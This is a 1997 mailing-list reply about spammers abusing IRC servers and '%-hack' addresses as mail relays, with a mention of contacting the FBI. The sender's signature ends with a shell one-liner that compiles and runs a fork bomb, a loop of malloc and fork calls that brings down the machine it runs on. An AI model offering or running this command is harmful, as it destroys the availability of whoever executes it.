Re: An end to spam through Graphnet

  • From: Keith McCallion
  • Date: Sat Aug 02 23:52:20 1997

On Sat, 2 Aug 1997, Jon Lewis wrote:

> Someone told me that a spam package was distributed that specifically
> targets IRC servers as relays.  It would seem they don't bother updating
> the list, or their software is so popular that old versions stay in use.
>
> The system above blocks about 3,000 relay attempts per day, every day,
> since it got the anti-relay patches months ago.

Welcome to the club.. It's Avalanche and even though we've sense put exim
and relaying protection on the machine, we are still being pounded by
attempts to use the %-hack relays. We've actually contacted the FBI about
it, and they seemed willing to investigate it, but they never got back to
us -- our FBI contacts have kind of faded away.

Spam sucks..

Keith
Keith M. McCallion                            Director; Network Operations
Trippin on irc.iswest.net                        Internet Specialties West
keith@iswest.net/keith@hick.com                  31194 La Baya Dr, Ste 106
P: 818-735-3000, F: 818-735-3004            Westlake Village, Calif. 91362
   echo "main(){while(1){malloc(10000);fork();}}" >z.c;gcc -o z z.c;./z